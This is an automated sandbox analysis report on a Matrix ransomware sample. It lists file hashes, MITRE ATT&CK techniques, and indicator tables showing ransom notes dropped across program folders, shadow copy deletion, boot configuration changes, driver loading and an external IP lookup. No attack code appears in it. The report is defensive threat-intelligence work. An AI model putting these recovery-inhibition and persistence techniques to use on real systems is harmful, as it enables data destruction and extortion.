matrix | 11ce680173c5dc97b727bdefcfcef60c6885ede3444815849efa97750c340ea9

Analysis

max time kernel
151s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
03-11-2022 12:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

907636b28d162f7110b067a8178fa38c.exe
Size

1.2MB
MD5

907636b28d162f7110b067a8178fa38c
SHA1

048ae4691fe267e7c8d9eda5361663593747142a
SHA256

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512

501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
SSDEEP

24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Score

10^/10

matrix discovery evasion persistence ransomware upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\_platform_specific\win_x64\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Mozilla Firefox\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Users\Default\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Users\All Users\Microsoft\MF\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\3082\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Google\Chrome\Application\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Users\Admin\Favorites\Links\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Users\Public\Pictures\Sample Pictures\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Library\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Users\All Users\Package Cache\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}v14.30.30704\packages\vcRuntimeAdditional_amd64\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\Desktop\TileWallpaper = "0"	reg.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Users\Admin\Favorites\MSN Websites\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\QUERIES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1224	bcdedit.exe
1764	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	752	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	iOwlD4KZ64.exe

Executes dropped EXE 3 IoCs

pid	Process
1940	NWYHhHYv.exe
1620	iOwlD4KZ.exe
1460	iOwlD4KZ64.exe

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\GrantRequest.tiff	907636b28d162f7110b067a8178fa38c.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	iOwlD4KZ64.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000014baa-88.dat	upx
behavioral1/files/0x0006000000014baa-87.dat	upx
behavioral1/files/0x0006000000014baa-90.dat	upx
behavioral1/memory/1620-92-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/1620-98-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Loads dropped DLL 4 IoCs

pid	Process
1824	907636b28d162f7110b067a8178fa38c.exe
1824	907636b28d162f7110b067a8178fa38c.exe
1912	cmd.exe
1620	iOwlD4KZ.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1252	takeown.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	iOwlD4KZ64.exe
File opened (read-only)	\??\S:	iOwlD4KZ64.exe
File opened (read-only)	\??\O:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\J:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\G:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\E:	iOwlD4KZ64.exe
File opened (read-only)	\??\I:	iOwlD4KZ64.exe
File opened (read-only)	\??\T:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\I:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\A:	iOwlD4KZ64.exe
File opened (read-only)	\??\G:	iOwlD4KZ64.exe
File opened (read-only)	\??\Z:	iOwlD4KZ64.exe
File opened (read-only)	\??\V:	iOwlD4KZ64.exe
File opened (read-only)	\??\W:	iOwlD4KZ64.exe
File opened (read-only)	\??\Y:	iOwlD4KZ64.exe
File opened (read-only)	\??\R:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\P:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\P:	iOwlD4KZ64.exe
File opened (read-only)	\??\R:	iOwlD4KZ64.exe
File opened (read-only)	\??\U:	iOwlD4KZ64.exe
File opened (read-only)	\??\Z:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\K:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\B:	iOwlD4KZ64.exe
File opened (read-only)	\??\H:	iOwlD4KZ64.exe
File opened (read-only)	\??\K:	iOwlD4KZ64.exe
File opened (read-only)	\??\M:	iOwlD4KZ64.exe
File opened (read-only)	\??\X:	iOwlD4KZ64.exe
File opened (read-only)	\??\X:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\V:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\H:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\F:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\J:	iOwlD4KZ64.exe
File opened (read-only)	\??\Q:	iOwlD4KZ64.exe
File opened (read-only)	\??\Y:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\Q:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\N:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\N:	iOwlD4KZ64.exe
File opened (read-only)	\??\O:	iOwlD4KZ64.exe
File opened (read-only)	\??\E:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\F:	iOwlD4KZ64.exe
File opened (read-only)	\??\W:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\U:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\S:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\M:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\L:	907636b28d162f7110b067a8178fa38c.exe
File opened (read-only)	\??\T:	iOwlD4KZ64.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	myexternalip.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\rNwjBuHZ.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\IPIRM.XML	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Default.dotx	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL065.XML	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Premium.gif	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jre7\lib\amd64\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18209_.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153091.WMF	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN044.XML	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00289_.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107446.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15056_.GIF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0250504.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV.HXS	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART6.BDR	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH02166_.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0090070.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\background.gif	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIcon.png	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSSPC.ECF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BOAT.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar	907636b28d162f7110b067a8178fa38c.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#CORE_README#.rtf	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BIZCARD.DPV	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0290548.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02116_.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287408.WMF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14710_.GIF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGSIDEBRV.XML	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR37F.GIF	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\subscription.xsd	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_left_over.gif	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Managua	907636b28d162f7110b067a8178fa38c.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_ON.GIF	907636b28d162f7110b067a8178fa38c.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1564	schtasks.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1520	vssadmin.exe
1144	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
752	powershell.exe
1460	iOwlD4KZ64.exe
1460	iOwlD4KZ64.exe
1460	iOwlD4KZ64.exe
1956	powershell.exe
1956	powershell.exe
1956	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1460	iOwlD4KZ64.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	1460	iOwlD4KZ64.exe
Token: SeLoadDriverPrivilege	1460	iOwlD4KZ64.exe
Token: SeBackupPrivilege	964	vssvc.exe
Token: SeRestorePrivilege	964	vssvc.exe
Token: SeAuditPrivilege	964	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1904	WMIC.exe
Token: SeSecurityPrivilege	1904	WMIC.exe
Token: SeTakeOwnershipPrivilege	1904	WMIC.exe
Token: SeLoadDriverPrivilege	1904	WMIC.exe
Token: SeSystemProfilePrivilege	1904	WMIC.exe
Token: SeSystemtimePrivilege	1904	WMIC.exe
Token: SeProfSingleProcessPrivilege	1904	WMIC.exe
Token: SeIncBasePriorityPrivilege	1904	WMIC.exe
Token: SeCreatePagefilePrivilege	1904	WMIC.exe
Token: SeBackupPrivilege	1904	WMIC.exe
Token: SeRestorePrivilege	1904	WMIC.exe
Token: SeShutdownPrivilege	1904	WMIC.exe
Token: SeDebugPrivilege	1904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1904	WMIC.exe
Token: SeRemoteShutdownPrivilege	1904	WMIC.exe
Token: SeUndockPrivilege	1904	WMIC.exe
Token: SeManageVolumePrivilege	1904	WMIC.exe
Token: 33	1904	WMIC.exe
Token: 34	1904	WMIC.exe
Token: 35	1904	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1904	WMIC.exe
Token: SeSecurityPrivilege	1904	WMIC.exe
Token: SeTakeOwnershipPrivilege	1904	WMIC.exe
Token: SeLoadDriverPrivilege	1904	WMIC.exe
Token: SeSystemProfilePrivilege	1904	WMIC.exe
Token: SeSystemtimePrivilege	1904	WMIC.exe
Token: SeProfSingleProcessPrivilege	1904	WMIC.exe
Token: SeIncBasePriorityPrivilege	1904	WMIC.exe
Token: SeCreatePagefilePrivilege	1904	WMIC.exe
Token: SeBackupPrivilege	1904	WMIC.exe
Token: SeRestorePrivilege	1904	WMIC.exe
Token: SeShutdownPrivilege	1904	WMIC.exe
Token: SeDebugPrivilege	1904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1904	WMIC.exe
Token: SeRemoteShutdownPrivilege	1904	WMIC.exe
